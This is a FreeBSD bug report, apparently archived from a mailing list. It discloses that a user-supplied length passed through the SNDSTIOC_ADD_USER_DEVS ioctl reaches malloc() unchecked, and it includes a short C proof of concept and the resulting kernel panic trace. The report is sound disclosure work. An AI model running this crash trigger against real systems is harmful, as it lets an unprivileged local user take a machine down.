[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash
- Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
- Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
- Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
- Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
- Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
- Reply: bugzilla-noreply_a_freebsd.org: "[Bug 266142] SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash"
- Go to: [ bottom of page ] [ top of archives ] [ this month ]
Date: Wed, 31 Aug 2022 20:30:49 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=266142 Bug ID: 266142 Summary: SNDSTIOC_ADD_USER_DEVS ioctl on /dev/sndstat passes unchecked size from user to malloc() -> potential crash Product: Base System Version: CURRENT Hardware: Any OS: Any Status: New Severity: Affects Some People Priority: --- Component: kern Assignee: bugs@FreeBSD.org Reporter: rtm@lcs.mit.edu User code specifies a 64-bit length to the SNDSTIOC_ADD_USER_DEVS ioctl, which sndstat_add_user_devs() passes to sndstat_unpack_user_nvlbuf() (as arg->nbytes), which is then passed as the size to malloc(). One way this can go wrong is if the user passes in (size_t)-1, which this line in malloc_large() turns into zero: size = roundup(size, PAGE_SIZE); which either causes the MPASS(size > 0) in vmem_alloc() to fail, or (if not INVARIANTS) causes a later kernel page fault. A demo: int main() { int fd = open("/dev/sndstat", 2); if(fd < 0) { perror("/dev/sndstat"); exit(1); } char buf[128]; memset(buf, 0xff, sizeof(buf)); ioctl(fd, 0xc0104466, buf); // SNDSTIOC_ADD_USER_DEVS } # uname -a FreeBSD 14.0-CURRENT FreeBSD 14.0-CURRENT #71 main-n250928-b8170f38ccc7-dirty: Wed Aug 31 16:05:23 EDT 2022 rtm@xxx:/usr/obj/usr/rtm/symbsd/src/riscv.riscv64/sys/RTM riscv # cc x.c # ./a.out panic: Fatal page fault at 0xffffffc00039b2be: 0x27fffd000809460 cpuid = 0 time = 1661976398 KDB: stack backtrace: db_trace_self() at db_trace_self db_trace_self_wrapper() at db_trace_self_wrapper+0x38 kdb_backtrace() at kdb_backtrace+0x2c vpanic() at vpanic+0x170 panic() at panic+0x2a page_fault_handler() at page_fault_handler+0x1d6 do_trap_supervisor() at do_trap_supervisor+0x76 cpu_exception_handler_supervisor() at cpu_exception_handler_supervisor+0x70 --- exception 13, tval = 0x27fffd000809460 vmem_alloc() at vmem_alloc+0x88 kmem_malloc_domain() at kmem_malloc_domain+0x6a kmem_malloc_domainset() at kmem_malloc_domainset+0x36 malloc_large() at malloc_large+0x44 malloc() at malloc+0xf8 sndstat_unpack_user_nvlbuf() at sndstat_unpack_user_nvlbuf+0x26 sndstat_add_user_devs() at sndstat_add_user_devs+0x4a sndstat_ioctl() at sndstat_ioctl+0xae devfs_ioctl() at devfs_ioctl+0xbe VOP_IOCTL_APV() at VOP_IOCTL_APV+0x30 VOP_IOCTL() at VOP_IOCTL+0x36 vn_ioctl() at vn_ioctl+0xba fo_ioctl() at fo_ioctl+0xa kern_ioctl() at kern_ioctl+0x242 sys_ioctl() at sys_ioctl+0x120 syscallenter() at syscallenter+0xec ecall_handler() at ecall_handler+0x18 do_trap_user() at do_trap_user+0xea cpu_exception_handler_user() at cpu_exception_handler_user+0x72 devfs_ioctl_f() at devfs_ioctl_f+0x20 -- You are receiving this mail because: You are the assignee for the bug.